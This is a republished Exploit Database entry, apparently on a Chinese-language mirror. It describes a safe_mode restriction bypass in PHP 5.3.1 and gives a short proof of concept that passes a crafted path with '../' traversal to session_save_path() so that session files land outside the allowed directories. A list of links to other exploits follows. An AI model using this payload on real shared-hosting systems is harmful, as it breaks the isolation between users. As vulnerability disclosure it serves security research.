PHP 5.3.1 – ‘session_save_path() Safe_mode()’ Restriction Bypass Exploiot

Exploit Database
12 阅读

作者： Grzegorz Stachowiak

日期： 2010-02-11
类别：
- dos
平台：
- php
来源：https://www.exploit-db.com/exploits/33625/

source: https://www.securityfocus.com/bid/38182/info

PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; the 'safe_mode' restrictions are assumed to isolate users from each other. 

{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}

last Exploits
PHP 5.3.1 – ‘session_save_path() Safe_mode()’ Restriction Bypass Exploiot的更多信息

SQL Server Password Changer 1.90 – Denial of Service：
SpotAuditor 5.3.1.0 – Denial of Service：
Netwide Assembler (NASM) 2.14rc15 – NULL Pointer Dereference (PoC)：
Divx Player 6.8.2 – Denial of Service：
VideoLAN VLC Media Player 2.2.1 – ‘.mp4’ Heap Memory Corruption：
Graphite2 – TtfUtil::CheckCmapSubtable12 Heap Overread：
Konica Minolta FTP Utility 1.0 – ‘LIST’ Denial of Service (PoC)：
PHP 7.0.0 – Format String：